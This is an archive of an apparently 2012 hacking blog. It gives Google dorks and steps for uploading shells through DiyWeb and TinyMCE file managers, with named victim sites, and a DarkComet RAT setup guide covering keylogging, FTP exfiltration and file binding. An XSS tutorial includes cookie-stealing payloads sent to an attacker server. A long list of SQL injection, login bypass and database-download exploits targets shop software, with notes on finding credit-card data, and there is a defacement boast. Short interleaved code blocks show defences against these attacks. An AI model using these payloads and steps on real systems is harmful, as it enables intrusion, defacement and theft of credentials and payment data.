Monthly Archives: September 2012

#DiyWeb Admin Bypass and Remote file/shell Upload exploit

Hi guys, hope you are well. So we are back on our old topic after a long time! Enjoy the new exploit, please share your views and share our links on Facebook, Twitter etc. Thanks!
Now to work. Our new exploit is a DiyWeb admin bypass; with this vulnerability we can upload our shell, deface pages and upload files by bypassing the admin login panel.
Exploit title : DiyWeb Admin Bypass and File Upload exploit
Discovered By : NoentryPhc
Server : windows
Type : web application
Shell extension : .asp

Dork : “Power by DiyWeb”
inurl:/template.asp?menuid=
Poc : diyweb/menu/admin/image_manager.asp
Almost all websites vulnerable to this exploit are Malaysian.
To upload your files go to: http://www.website.com/diyweb/menu/admin/image_manager.asp
and upload your shell/deface there!
If the .php extension is not allowed, you can try Tamper Data and Live HTTP Headers.
To access your file go to: http://www.website.com/Images/yourfilehere and sometimes you have to find your file manually on the website.
Live Demo : 
http://otgmalaysia.com/diyweb/menu/admin/image_manager.asp
http://www.famosapadu.com.my/diyweb/menu/admin/image_manager.asp
Find more using the Google dork 🙂 Thanks for reading. Please share the post on Facebook and other social networks.

#Tinymce PHP file Manager, Remote File upload vulnerably

Title : Tinymce PHP file Manager, Remote File upload vulnerability
server : Linux
Type : webapp Exploit
Harm : remote shell upload
Dork : inurl:/file_manager.php?type=img


Go to google.com and type the dork inurl:/file_manager.php?type=img or inurl:/file_manager.php?type=file to find vulnerable websites; to get more sites you can modify this dork.
Exploit Path : http://www.site.com/directory/tinymce/file_manager.php?type=file
So go to http://www.site.com/directory/tinymce/file_manager.php?type=file and upload your file there.
If php & html uploading is denied, you can try Tamper Data and Live HTTP Headers.
Live demo :
http://piter-ka.ru/media/tinymce/file_manager.php?type=file
http://www.oki-iroda.hu/72h2010/tinymce/jscripts/file_manager.php?type=img
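
Both upload posts above depend on the file check living on the client or trusting the request headers, which is why they suggest retrying with Tamper Data or Live HTTP Headers when .php is refused. The following is an added example, not code from DiyWeb, TinyMCE or this blog, of the server-side check that closes that gap: the client's Content-Type is ignored, the last extension must be on an allow-list, the body must begin with that format's magic bytes, and the file is stored under a random name. The sample image bytes and all function names are constructed for this example.

```python
import posixpath
import uuid

# Extensions an image manager actually needs. Everything else, including
# .asp, .php and .html, is refused no matter what the client claims.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of each accepted format (from the public format specs).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Constructed sample bodies: a minimal JPEG/JFIF header and a PNG signature.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 8
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8


def extension_of(filename):
    """Last extension of the final path component, lower-cased.
    'shell.php.jpg' -> 'jpg', '..\\x.asp' -> 'asp', 'README' -> ''."""
    base = posixpath.basename(filename.replace("\\", "/"))
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def validate_upload(filename, data):
    """Server-side decision on one uploaded file; returns (accepted, reason).

    The client's Content-Type header is deliberately not a parameter: it is
    exactly what a proxy or header-editing add-on rewrites, so it carries no
    trust. Only the submitted name and the bytes themselves are inspected."""
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension '%s' is not on the allow-list" % ext
    if not data.startswith(MAGIC[ext]):
        return False, "body does not start like a %s image" % ext
    return True, "ok"


def storage_name(filename):
    """Name to store an accepted file under: a random token plus the validated
    extension. The client-chosen name never reaches the filesystem, which also
    discards any directory traversal it carried."""
    return uuid.uuid4().hex + "." + extension_of(filename)


if __name__ == "__main__":
    # The cases from the posts above: a script named as a script, a script
    # renamed to an image extension, and a genuine image.
    for name, body in [("shell.asp", b"<% ... %>"),
                       ("deface.php", b"<?php ... ?>"),
                       ("deface.jpg", b"<?php ... ?>"),
                       ("photo.jpg", SAMPLE_JPEG)]:
        print(name, validate_upload(name, body))
    print("stored as", storage_name("../../photo.JPG"))
```

Serve the stored files from a directory where the web server does not execute scripts, because a name and magic-byte check alone cannot distinguish a real image from one with script appended.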

#Botnet command server hidden in Tor

The G Data SecurityLabs recently identified a malware sample that takes the next step in Command-and-Control (short: C&C) communication evolution, regarding C&C traffic obfuscation. The botnet owners placed their C&C server, which uses the common IRC protocol, as a hidden service inside of the Tor network.

The analyzed bot:

Despite the novel way of C&C-communication, the other features of the analyzed bot are quite common these days. It offers several possibilities for DDoS attacks, can download and execute other malware, and can act as SOCKS proxy to anonymize the attacker.

What is it about?

One of the biggest challenges for botnet owners is the protection of Command-and-Control traffic. C&C traffic is required to give orders to the “zombies”, the infected computers that are part of the botnets. Generally, up to now, two approaches existed for C&C traffic: Either a central control server is put somewhere on the Internet or Peer-to-Peer-networks (short: P2P) are built up to ensure the chain of commands.

One central C&C server:

Central control servers have a big problem: Regardless of the underlying protocol, they are a “single point of failure”. The servers can be taken over by authorities, and thus the malware can be uninstalled from the zombies. It is possible to conceal the server, e.g. by having a hidden algorithm that changes domain names on a daily basis; but these algorithms can be reverse engineered.
Schematic of direct client-Command-and-Control server communication

The P2P architecture:

An alternative is the usage of classic P2P networks. P2P networks became (in)famous with the rise of Napster, which used to be a service where every user could send and receive music from and to other users. Every user acted as client and server simultaneously, hence the term Peer-to-Peer.

Malware adapted to this scheme by giving every zombie the ability to issue commands to other zombies. The botnet owner issues the command to a handful of zombies, and these zombies propagate the commands to other zombies, and so on and so forth. Even though this seems to be more sophisticated than the direct client-server-communication, it is anything but perfect.
Zombies are often located behind routers, meaning that they effectively cannot act as a server, because the routers do not allow incoming traffic by default. Also, the protocol has to be especially designed for the respective bot, which results in a great implementation effort.

Furthermore, there are security issues the botnet owners have to think about: By design, every zombie programmed for the P2P-communication has the ability to issue commands to other zombies. Therefore authorities or other cybercriminals could issue commands to conduct a hostile takeover of the botnet. Generally, it is possible to authenticate messages, but botnet owners often find it hard to implement this or are not willing to put that much effort into these authentication mechanisms. This resulted in several botnet takedowns and even takeovers in the last couple of years.

The next step made – using the Tor network

The next step in evolution is the usage of the Tor network. Tor is generally known as web anonymization service for end users, but Tor offers more than that: “Tor makes it possible for users to hide their locations while offering various kinds of services, such as web publishing or an instant messaging server.”

In this particular case, the creators of the malware decided to build an IRC server as hidden service.
Schematic of the client-Command-and-Control server communication using the Tor network with Hidden Services

This gains the botnet owner several advantages:

  • The server is anonymous and thus cannot point to the botnet owners’ identity.
  • The server cannot be taken down easily.
  • The traffic is encrypted by Tor, so it can’t be blocked by Intrusion Detection Systems.
  • Tor traffic usually cannot be blocked altogether, because there are also legit use cases for Tor.
  • The bot creator does not necessarily have to generate a custom protocol, but can use the known and reliable IRC protocol.

Besides these advantages, it has to be noted that malware like this suffers from the latencies that come with the Tor network. In other words: Tor tends to be slow and unreliable, and passes these flaws on to the botnets built on it. Also, while this traffic adds a lot of security to the botnet communication, the malware itself can still be blocked by AV software using signature- and behavior-based detection mechanisms.

#How To Set Up and Use DarkComet RAT

You have the DarkComet RAT but don't know how to use it?

Then:

1. Download Dark comet rat from here : http://adf.ly/Cc6Di

2. Open it and you should see something like this

[Image: darkcometrat1.JPG]


3. Click on Edit server

[Image: darkcometrat2.JPG]


4. (Main settings) Mutex String:

Our RAT client will run in the process space of another process to remain stealthy. This string helps the RAT differentiate that another process is holding our data for hiding. It must be specified for proper functioning of the RAT client; you can give it any name you want or just press random to get a random name.
Server ID:

This name will appear in the server list when your victim executes your server. It helps in differentiating different servers, so better use a new name for each new server.

Lastly, always preserve the connection with a good user name and password.

[Image: darkcometrat4.JPG]


5. (Connection settings) Specify your IP address in the IP address field if you have a static IP, or use Dynamic DNS if your IP address is not static. To know more about Dynamic DNS read Use Dynamic IP As Static IP. Now specify the port number you want to listen on and press “Add This Range In IP/port list”. For testing purposes you can use 127.0.0.1, the loopback IP, and port 8080, i.e. the HTTP proxy port.

[Image: darkcometrat5.JPG]


6. Go to server start up
Here you can specify where your server will get installed on the victim's PC, and you can also specify in which process you wish to hide your server. A good choice of process is svchost.exe. The melt server option will delete the server file as soon as the server gets installed. Other options include adding registry keys; use them if you want, but it works fine without any key. Don't forget to enable the option “Start Server ON Startup”.

[Image: darkcometrat6.JPG]


7. Server Shield.
Server Shield provides the server with file attributes and folder attributes for installation, and basic fun options to harass the victim. I would advise not to use them, because they will alert the user to the presence of your RAT server.

[Image: darkcometrat7.JPG]


8. Offline keylogger
Activate the offline keylogger so that the keylogger logs files even when you are offline. If you want the server to send log files to your FTP server rather than accumulating them on the victim's PC, specify the credentials required for your FTP server. If you don't have an FTP server, you can search for “free ftp service” on Google and you will get heaps of them, or you can try http://www.zymic.com/free-web-hosting/ which offers free web hosting plus free FTP service. Good for practice.

[Image: darkcometrat8.JPG]


9. Go to file binder

[Image: darkcometrat9.JPG]

Select the file you want to bind with the RAT server; binding with another file makes the RAT server remain in stealth mode and get executed with the legitimate file, thus avoiding detection.

10. Generate server.

[Image: darkcometrat10.JPG]

Select all options and generate server.

11. Listen
Now close the server edit window and press listen, specify port number 8080 and then execute your RAT server.

[Image: darkcometrat12.JPG]


12. Listening on port 8080

[Image: darkcometrat12.JPG]

Now right click on the listening port and select “Open Control Center”, and play with the available options.

[Image: darkcometrat13.JPG]


[Image: darkcometrat14.JPG]


The pics above are of the control center.

You have successfully set up the RAT :)

xL3gi0n Changes His Name !

 

The owner of xL3gi0n Hackers, whose name within the group was xL3gi0n.. The group is still called xL3gi0n Hackers, but the owner of the group changed his name to..

xPsych0path.. His new contact info is different; you can see it below this post of words… Haha, but anyway, he just changed his name mainly because of the confusion.. People asking him “did you hack it, or your group?” because it's called xL3gi0n Hackers and his name was xL3gi0n, that's why… But hope you enjoy this site!!!!!

 

Email xPsych0path@hotmail.com

:-http://www.facebook.com/xPsych0path <– Like on facebook.

ωє αяє χℓ3gι0η.уσυ αяє ησтнιηg. уσυ ωιℓℓ ƒαℓℓ ιη тнє нαη∂’ѕ σƒ συя ƒєℓℓσω вяσтнєяѕ αη∂ ѕιѕтєяѕ. ωє υηιтє αѕ σηє вυт ƒιgнт αѕ мαηу.

Save The Pandas !

Save the pandas 😀


xL3gi0n defaces 2 sites that have to do with cutting down bamboo. By this he saves pandas and their natural habitat; they sell their bamboo online to other online merchants etc…

SAVE PANDAS 😀

http://giaochau.com.vn/ <– Giao Chau Rattan & Bamboo Manufacture And Export Co. Ltd <– Under the same server

http://bamboocraftgc.com/ < — Giao Chau Rattan & Bamboo Manufacture And Export Co. Ltd <– Under the same server

http://www.zone-h.org/archive/notifier=xL3gi0n <– Mirrors :DD

#How To Do XSS

Table Of Contents

What is XSS?
Finding XSS Vulnerabilities
The Basics On XSS
Deface Methods
Cookie Stealing
Filtration Bypassing
___________________
What is XSS?
‘XSS’, also known as ‘CSS’ (Cross Site Scripting, easily confused with ‘Cascading Style Sheets’),
is a very common vulnerability found in web applications. ‘XSS’ allows the attacker to INSERT
malicious code. There are many types of XSS, but I will only explain the 3 most important ones:
1- ‘URL XSS’: this means the XSS won't stay on the page; it will only get executed if you have the malicious code in the URL and submit the URL.

2- Input fields: wherever you can insert data, it is very common to be XSS vulnerable. For example, say we found a site with a search engine. In the search box you enter ‘hacker’ and hit enter; when the page loads, if it shows your data like ‘Found 100 Results For hacker’, you can see it is displaying our data on the page. Now, what if we can execute code? There is no possible way to execute PHP code in this attack, but there certainly is for HTML and JavaScript, so be aware of this method.

3- In the third one you will be able to INSERT data (code) and it will stay on the website. Now there are 2 kinds; it depends on whether we can execute PHP or HTML. If we can inject PHP then we can also inject HTML, but NOT vice versa. This kind of attack is normally found on blogs, shoutboxes, profiles, forums, just most places where you insert data and it stays there. Now HTML is totally different from PHP: HTML downloads to your PC and then your ‘browser’ parses/interprets the code (that's why its source is viewable). With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser. PHP injection is rare, but it doesn't harm to try. Note: PHP code can't be injected into an HTML page!

Finding XSS Vulnerabilities
Well, to start finding these vulnerabilities you can start checking out
blogs, forums, shoutboxes, comment boxes, search boxes and many other things,

using ‘Google Dorks’ to make the finding easier. OK, if you wanna get cracking, go to Google.com and type
inurl:”search.php?q=”. Now that is a common page and has a lot of results. Now let's move on to the next part.

The Basics On XSS

To know the basics this picture may help you

[Image: xss.png]

The most used XSS injection is

<script>alert("XSS")</script>

This will show a popup saying XSS if the site is vulnerable, and it is easily editable, meaning you can also inject
<script>alert("your name or message")</script>
So, going back, I told you a Google dork: search.php?q=
Well, we will use this to check for vulnerabilities

To check if it is vulnerable we type

http://www.site.com/search.php?q=<script>alert("your name or message")</script>

This then gives a popup like this

[Image: 1123.jpg]

Many times this works, but if it does not work don't cry, we have another way..

You can try injecting HTML 😉

You can use these two strings to inject HTML

<h1>anything you want</h1>
<br><br><b><u>any thing you want</u></b>

so our URL will be

http://www.site.com/search.php?q= <h1>anything you want</h1>
or
http://www.site.com/search.php?q=<br&…t;u>any thing you want</u></b>
If you see the bold text and newlines on the page then you know it's vulnerable

Example

[Image: cats.jpg]

Deface Methods
Well, now that you understand how XSS works, we can explain some simple XSS deface methods. There
are many ways of defacing; I will mention some of the best and the ones I used most.

<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

the first one being IMG SRC. Now for those of you who don't know HTML, IMG SRC is a tag that
displays the image linked to it on the webpage.

OK, now if you change the link to a valid picture link, save it and run it, you will see your deface page.

Let us say we have found a shoutbox, comment box, or anything that shows your data after you submit it; you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

OK, it helps to make your picture big so it stands out and it's clear the site got hacked.

Another method is using FLASH videos; it's the same as the method above but a little more stylish deface.

window.open( "http://Dl4hacks.net" )</script>

Cookie Stealing

This is the best thing about XSS..

First Get your self a cookie stealer- from here

OK, now you have it; save it as a .php file and upload it to your server. Remember to create the file ‘log.txt’ too
and chmod it to 777. OK, now find an XSS vulnerable website; any attack type will do.

OK, now you're going to want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
Now when a user visits the page that got injected, they will be sent to the site and the cookie will be stolen.
The second one is more stealthy.

Now it is the time to hijack the cookies

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
Filtration Bypassing

A lot of sites may seem vulnerable but do not execute the code. This will help you.

Some common methods to bypass filtration are

')alert('xss');

or

");alert('xss');

that will do the same thing as <script>alert("XSS")</script> on a vulnerable server.

You can also try hex or base64 encoding your data before you submit.

Please note it's bad practice to use alert("XSS") to test for XSS, as I've known sites to block the keyword XSS
before.

Some other ways to bypass filtration

<script type=text/javascript>alert("saurav")</script>
<script>alert("saurav")</script>;
<script>alert("saurav");</script>
<script>alert("/saurav"/)</script>

Thanks!
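
As an added example (not part of the tutorial above), the script below runs the tutorial's own injection strings through two defences for the reflected search.php?q= case: a keyword blocklist of the kind the text says some sites use, which stops only the textbook string, and contextual HTML output encoding, which neutralises every variant. The URL and function names are assumptions made for this example.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Injection strings quoted in the tutorial, reused here as test input.
BASIC = '<script>alert("XSS")</script>'
H1 = "<h1>anything you want</h1>"
IMG = '<IMG SRC="http://site.com/yourDefaceIMAGE.png">'
TYPED_SCRIPT = '<script type=text/javascript>alert("saurav")</script>'
PAYLOADS = (BASIC, H1, IMG, TYPED_SCRIPT)

# Matches the start of any HTML tag, opening or closing.
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z]")


def q_from_url(url):
    """The 'q' value exactly as search.php would receive it (percent-decoded)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("q", [""])[0]


def naive_filter(q):
    """The kind of blocklist the tutorial alludes to: strip the word XSS and
    the literal <script> tags. Anything not on the list passes untouched."""
    for bad in ("XSS", "<script>", "</script>"):
        q = q.replace(bad, "")
    return q


def encode_for_html(q):
    """Output encoding for an HTML text context: < > & " ' become entities,
    so the browser shows them as text instead of parsing them as markup."""
    return html.escape(q, quote=True)


def render_results(q, sanitize):
    """The reflected line from the tutorial ('Found 100 Results For ...')."""
    return "<p>Found 100 Results For %s</p>" % sanitize(q)


def markup_survives(q, sanitize):
    """True if the user-controlled text still contains an HTML tag after
    sanitize() ran, i.e. the reflection is still live markup."""
    return TAG_RE.search(sanitize(q)) is not None


if __name__ == "__main__":
    q = q_from_url('http://www.site.com/search.php?q=<script>alert("XSS")</script>')
    print("received:", q)
    for p in PAYLOADS:
        print("%-55s blocklist: %-5s encoding: %s" % (
            p, markup_survives(p, naive_filter), markup_survives(p, encode_for_html)))
    print(render_results(BASIC, encode_for_html))
```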

#RFI Dorks


#Big List Of Google Dorks Hacking.

Most of these are outdated but they can still work if you happen to find a vulnerable site:

1:

google dork :–> inurl:”/cart.php?m=”
target looks like :–> http://xxxxxxx.com/s…cart.php?m=view
exploit: change cart.php?m=view to /admin
target with exploit :–> http://xxxxxx.com/store/admin
Username : 'or''='
Password : 'or''='

2-

google dork :–> allinurl:proddetail.asp?prod=
target looks like :–> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big letters and numbers)
exploit :–> change proddetail.asp?prod=SG369 to fpdb/vsproducts.mdb
target with exploit :–> http://www.xxxxxx.org/fpdb/vsproducts.mdb

3-

google dork :–> allinurl: /cgi-local/shopper.cgi
target looks like :–> http://www.xxxxxx.co….dd=action&key=
exploit :–> …&template=order.log
target with exploit :–> http://www.xxxxxxxx…..late=order.log

4-

google dork :–> allinurl: Lobby.asp
target looks like :–> http://www.xxxxx.com/mall/lobby.asp
exploit :–> change /mall/lobby.asp to /fpdb/shop.mdb
target with exploit :–> http://www.xxxxx.com/fpdb/shop.mdb

5-

google dork :–> allinurl:/vpasp/shopsearch.asp
when you find a target put this in the search box
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Don't forget to change the and to whatever you like.
To change the admin password, enter the following keyword:
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

login page: http://xxxxxxx/vpasp/shopadmin.asp

6-

google dork :–> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :–> http://xxxxxxx.com/v….asp?cat=xxxxxx
exploit :–> http://xxxxxxx.com/vpasp/shopdisplay…20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername=’admin’%20and%20fldpassword%20like%2 0’a%25′-
if this is not working try these endings
%20’a%25′–
%20’b%25′–
%20’c%25′–
after finding user and pass go to login page:
http://xxxx.com/vpasp/shopadmin.asp

7-

google dork :–> allinurl:/shopadmin.asp
target looks like :–> http://www.xxxxxx.com/shopadmin.asp
exploit:
user : 'or'1
pass : 'or'1
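
Items 1 and 7 work because the login query is assembled by concatenating the submitted values into the SQL text, so the quote in 'or''=' ends the literal and the rest is parsed as SQL. As an added example (not code from any of the shop products listed here), the vulnerable query beside its parameterised form, using the tbluser/fldusername/fldpassword names from the VP-ASP items and a constructed in-memory SQLite database:

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the shop's user table, using the
    table and column names the items on this page pull from. Real systems
    store a password hash, never the clear text kept here for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbluser (fldusername TEXT, fldpassword TEXT)")
    conn.execute("INSERT INTO tbluser VALUES ('admin', 'example-only-password')")
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation: the quote characters in
    the submitted values end the literal early and the remainder is parsed
    as SQL, so 'or''=' turns the WHERE clause into one that is always true."""
    sql = ("SELECT fldusername FROM tbluser WHERE fldusername='" + username +
           "' AND fldpassword='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Same check with bound parameters: the driver sends the values
    separately from the statement text, so quotes stay data."""
    sql = "SELECT fldusername FROM tbluser WHERE fldusername=? AND fldpassword=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    # The two probes quoted in items 1 and 7 above.
    for probe in ("'or''='", "'or'1"):
        print(repr(probe), "vulnerable:", login_vulnerable(conn, probe, probe),
              "safe:", login_safe(conn, probe, probe))
    print("real credentials, safe:", login_safe(conn, "admin", "example-only-password"))
```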

8-

google.com :–> allinurl:/store/index.cgi/page=
target looks like :–> http://www.xxxxxx.co….short_blue.htm
exploit :–> ../admin/files/order.log
target with exploit :–> http://www.xxxxxxx.c….iles/order.log

9-

google.com:–> allinurl:/metacart/
target looks like :–> http://www.xxxxxx.com/metacart/about.asp
exploit :–> /database/metacart.mdb
target with exploit :–> http://www.xxxxxx.com/metacart/database/metacart.mdb

10-

google.com:–> allinurl:/DCShop/
target looks like :–> http://www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :–> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target with exploit :–> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt or http://www.xxxx.com/xxxx/DCShop/Orders/orders.txt

11-

google.com:–> allinurl:/shop/category.asp/catid=
target looks like :–> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :–> /admin/dbsetup.asp
target with exploit :–> http://www.xxxxxx.com/admin/dbsetup.asp
after getting that page look for the dbname and path. (these are also good files: sdatapdshoppro.mdb, access.mdb)
target for downloading the database :–> http://www.xxxxxx.com/data/pdshoppro.mdb (doesn't need to be like this)
in the db look for access to find the pass and user of the shop admins.

12-

google.com:–> allinurl:/commercesql/
target looks like :–> http://www.xxxxx.com/commercesql/xxxxx
exploit :–> cgi-bin/commercesql/index.cgi?page=
target with exploit admin config :–> http://www.xxxxxx.co…./admin_conf.pl
target with exploit admin manager :–> http://www.xxxxxx.co….in/manager.cgi
target with exploit order.log :–> http://www.xxxxx.com….iles/order.log

13-

google.com:–> allinurl:/eshop/
target looks like :–> http://www.xxxxx.com/xxxxx/eshop
exploit :–>/cg-bin/eshop/database/order.mdb
target with exploit :–> http://www.xxxxxx.co….base/order.mdb
after downloading the db look at access for user and password

14-

1/search google: allinurl:”shopdisplayproducts.asp?id=
—>http://victim.com/shopdisplayproducts.asp?id=5

2/find error by adding ‘
—>http://victim.com/shopdisplayproducts.asp?id=5'

—>error: Microsoft JET database engine error “80040e14″…../shop$db.asp, line 467

-If you don't see an error then change id to cat

—>http://victim.com/shopdisplayproducts.asp?cat=5'

3/if this shop has an error then add this: %20union%20select%201%20from%20tbluser”having%201= 1–sp_password

—>http://victim.com/shopdisplayproduct…on%20select%20 1%20from%20tbluser”having%201=1–sp_password

—>error: 5’ union select 1 from tbluser “having 1=1–sp_password…. The number of column in the two selected tables or queries of a union queries do not match……

4/ add 2,3,4,5,6……. until you see a nice table

add 2
—->http://victim.com/shopdisplayproduct…on%20select%20 1,2%20from%20tbluser”having%201=1–sp_password
then 3
—->http://victim.com/shopdisplayproduct…on%20select%20 1,2,3%20from%20tbluser”having%201=1–sp_password
then 4 —->http://victim.com/shopdisplayproduct…on%20select%20 1,2,3,4%20from%20tbluser”having%201=1–sp_password

…5,6,7,8,9…. until you see a table. (exp:…47)

—->http://victim.com/shopdisplayproduct…on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser” having%201=1–sp_password
—->see a table.
5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password

—>http://victim.com/shopdisplayproduct…on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1–sp_password

6/Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin.asp
Didn't work? Then you have to find it yourself:

add: (for the above example) ‘%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration”ha ving%201=1–sp_password

—>http://victim.com/shopdisplayproduct…n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration”ha ving%201=1–sp_password
you'll see something like (a lot of them):

shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
…………..

then guess the admin link by adding the above data until you find the admin links

15-

Type: VP-ASP Shopping Cart
Version: 5.00
Dork = intitle:VP-ASP Shopping Cart 5.00
You will find many websites with the VP-ASP 5.00 cart software installed
Now let’s get to the exploit..

the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this:
****://***.victim.com/shop/diag_dbtest.asp

A page will appear with something like:

xDatabase
shopping140

xDblocation
resx

xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the database,
try this while there is a dblocation:
xDblocation
resx

the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If you see the error message you have to try this:
****://***.victim.com/shop/shopping500.mdb

download the mdb file and you should be able to open it with any mdb file viewer; you should be able to find one at download.com

inside you should be able to find credit card information.
and you should even be able to find the admin username and password for the website.

the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp

if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are

Username: admin
password: admin
OR
Username: vpasp
password: vpasp
16-

Sphider Version 1.2.x (include_dir) remote file inclusion

# Sphider Version 1.2.x (include_dir) remote file inclusion
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found in index.php:
$include_dir = "./include"; <— no patch here
$language_dir = "./languages";
include "$include_dir/index_header.inc";
include "$include_dir/conf.php";
include "$include_dir/connect.php";

exploit : http://targe.lu/%5Bsphiderpath%5D/index.php?include_dir=injekan.lu